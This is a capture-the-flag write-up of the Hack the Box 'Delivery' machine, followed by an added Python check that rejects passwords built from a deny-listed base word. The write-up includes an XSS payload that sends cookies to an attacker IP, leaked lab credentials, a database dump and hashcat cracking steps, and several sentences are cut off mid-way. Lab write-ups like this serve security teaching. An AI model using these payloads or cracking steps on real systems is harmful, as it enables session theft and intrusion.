Writeup for Delivery from Hack the Box
nmap -sV -T4 -p- 10.10.10.222
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2
From the website, there are two links:
Add the following to the
Note the information here:
We don't have a @delivery.htb account, so we won't be able to access the MatterMost server just yet.
When submitting a ticket, the system is vulnerable to XSS.
<script> var i = new Image(); i.src = "http://10.10.14.16/log.php?q=" + escape(document.cookie); </script>
Unfortunately this doesn't work, anything with
Note that after creating a ticket, it says:
"If you want to add more information... just email ..."
So does this email simply forward everything it receives to the ticket?
- 1. We needed a
- 2. We needed email verification
The email does indeed forward everything to the ticket content:
By navigating to the link in the email, we can verify our account.
And we can log in to view some sensitive information:
We can use the maildeliverer:Youve_G0t_Mail! credential combination to authenticate and obtain SSH access to the server.
Right after we authenticate, we are greeted by the
After a bit of exploring:
mmuser:Crack_The_MM_Admin_PW is used for the mysql database credentials. We can log in to the 'local' MariaDB server:
mysql -u mmuser -p
(-u USERNAME -p, then enter the password when prompted)
SELECT * FROM Users;
I copied this into a text file.
Compile the password hashes into a
Remember the message in the MatterMost channel earlier? Most of these passwords should be variations of "PleaseSubscribe!"
We were also hinted to use hashcat rules.
cp /usr/share/hashcat/rules/best64.rule rules
Running hashcat on my host macOS:
hashcat -m 3200 users.hash wordlist -r rules (since hashcat requires a GPU)
Show cracked hash:
hashcat -m 3200 users.hash --show
Cross-checking with the
su, then use the
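The cracking step above succeeds because the passwords are rule-style variations of a base word that was disclosed in the channel. As an added example (not part of the original writeup), here is a password-change check that rejects such variations; the substitution map, the 0.8 threshold and the sample candidates are assumptions constructed for illustration.

```python
import difflib

# Base words users must not build passwords from. "PleaseSubscribe!" is the one
# named in the writeup; a real deny list would come from incident/breach data.
DENYLIST = ["PleaseSubscribe!"]

# Undo common character substitutions; i, l and 1 collapse to one symbol.
# Assumed mapping for illustration, not exhaustive.
LEET = str.maketrans({"0": "o", "1": "i", "l": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})


def skeleton(word):
    """Lowercase, undo substitutions, keep letters only."""
    return "".join(c for c in word.lower().translate(LEET) if c.isalpha())


def overlap(candidate_core, base_core):
    """Fraction of base_core present as one contiguous run in candidate_core."""
    m = difflib.SequenceMatcher(None, candidate_core, base_core, autojunk=False)
    match = m.find_longest_match(0, len(candidate_core), 0, len(base_core))
    return match.size / len(base_core)


def derived_from(candidate, denylist=DENYLIST, threshold=0.8):
    """Return the deny-listed base word the candidate is a variation of, or None."""
    core = skeleton(candidate)
    for base in denylist:
        base_core = skeleton(base)
        if not base_core:
            continue
        # Check the candidate as typed and reversed (reversal is a stock rule).
        score = max(overlap(core, base_core), overlap(core[::-1], base_core))
        if score >= threshold:
            return base
    return None


if __name__ == "__main__":
    # Constructed sample candidates: appended digits, substitutions,
    # reversal, truncation, and one unrelated passphrase.
    for pw in ["PleaseSubscribe!2024", "pl3a5eSub5cr1be", "!ebircsbuSesaelP",
               "PleaseSubscri", "correct horse battery staple"]:
        hit = derived_from(pw)
        print(f"{pw!r}: {'REJECT, variation of ' + hit if hit else 'ok'}")
```

Comparing canonical cores instead of exact strings is what catches appended digits, case toggles and substitutions that an exact-match deny list would let through.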